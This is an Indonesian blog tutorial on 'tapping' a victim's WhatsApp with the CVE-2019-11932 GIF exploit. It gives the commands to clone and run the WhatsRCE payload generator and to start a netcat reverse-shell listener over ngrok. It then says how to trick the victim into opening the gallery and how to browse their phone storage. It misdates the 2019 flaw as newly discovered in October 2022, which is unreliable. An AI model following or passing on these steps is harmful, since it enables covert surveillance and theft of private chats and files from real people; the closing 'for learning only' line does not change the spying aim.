Cara Sadap WhatsApp Lewat CMD 2022

 Baru baru ini Dunia Cyber di hebohkan dengan munculnya bug WhatsApp terbaru pada 2 Oktober 2022 yaitu Exploit RCE (Remote Code Execution) CVE-2019-11932 – Exploit ini hanya berjalan pada android 8.1 & 9.0, jadi Team nougat, kitkat dan lolipop santuy saja.

Exploit itu ditemukan oleh Security Researcher asal Vietnam bernama PHAM HONG NHAT.

Nama bug asli ini adalah double-free memory corruption dan di sulap menjadi Exploit RCE (Remote Code Execution), Apa itu RCE? yaitu meremot sistem dengan menggunakan code injection, Exploit ini bisa mencuri data korban seperti log chat, file, gambar dan menghapus seluruh data hanya dengan mengirim documents berupa GIF.


Bagaimana cara bug ini bekerja? kita cukup mengirim documents payload semacam code injection disisipkan menjadi gif dan dikirim ke whatsapp si korban, Jika kita sudah friend atau save nomor WhatsApp korban, Maka kita tidak perlu menunggu di klik/dibuka si korban.

Untuk mengatasi masalah bug WhatsApp RCE CVE-2019-11932 kita perlu update whatsapp ke versi terbaru 2.19.244 atau jangan pakai android versi 8 dan 9 hahaha.

Lalu bagaimana cara membuat file GIF tersebut, Kita hanya perlu membuat payload dengan Tools Generate Payload GIF RCE yaitu WhatsRCE yang dibutuhkan untuk membuat payolad tersebut yaitu Terminal seperti Linux, CMD untuk komputer dan Termux untuk di HP Android.


Disini Saya Akan Memberikan Tutorial

Cara Sadap WhatsApp Dengan CMD

Anda bisa menggunakan aplikasi Termux (Download di Play Store) dan menggunakan Linux.

Buka terminal anda dan masukkan command berikut.

sudo apt install git (enter)
git clone https://github.com/KeepWannabe/WhatsRCE (enter)
cd WhatsRCE && bash start.sh (enter)

Selanjutnya cara mendapatkan akses Shell.

Masukkan Host Listener dan Port anda, Bisa menggunakan ngrok.

Anda perlu mengirim file GIF ke korban (DOKUMEN BUKAN GAMBAR) dan atur nc / netcat ke port yang Anda atur di tool WhatsRCE nc -lnvp your_port

Agar Exploit ini bekerja beri tahu korban untuk membuka galeri melalui WhatsApp, Setelah itu beberapa detik kemudian Anda akan menerima koneksi shell dari korban.

Selanjutnya anda bisa melihat semua isi directory HP korban dengan ketik perintah ls -la /sdcard dan membuka folder dengan perintah cd namafolder.

Tutorial ini hanya untuk pembelajaran jadi manfaatkan untuk kebaikan yaa.

Jika anda mengalami kesulitan melakukan tutorial di atas, Silahkan berkomentar.

0 Response to "Cara Sadap WhatsApp Lewat CMD 2022"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel

Iklan Bawah Artikel